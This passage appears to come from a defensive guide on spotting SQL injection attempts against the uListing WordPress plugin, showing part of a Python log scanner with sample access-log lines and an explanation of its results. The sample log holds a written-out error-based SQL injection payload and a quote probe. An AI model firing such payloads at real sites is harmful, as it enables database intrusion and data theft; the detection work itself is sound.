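    '&current_page=1 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [18/Jun/2021:17:10:32 +0000] "GET /?bedrooms%5B%5D=37))%20AND%20(SELECT%204032%20FROM'
    '(SELECT%20COUNT(*),CONCAT(0x7176717171,(SELECT%20(ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)*2))x'
    '%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20((6842=6842&bathrooms%5B%5D=31 HTTP/1.1" 500 0',
    '192.0.2.9 - - [18/Jun/2021:17:12:01 +0000] "GET /?region=50%27 HTTP/1.1" 200 4801',
    '192.0.2.9 - - [18/Jun/2021:17:12:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["param"]}: {hit["reason"]} -> {hit["value"][:60]}')
```

Against the sample log this reports the SLEEP payload on range[price], the FLOOR/RAND payload on bedrooms[] and the quote probe on region, and nothing for the clean search or the login request. The allowlist check (shape of the value) is the durable part: the signatures only name the techniques sqlmap happened to use in the record, while any non-numeric value in these parameters is already outside what a legitimate listing search sends. None of this substitutes for the fix, which is updating uListing to 2.0.4 or later.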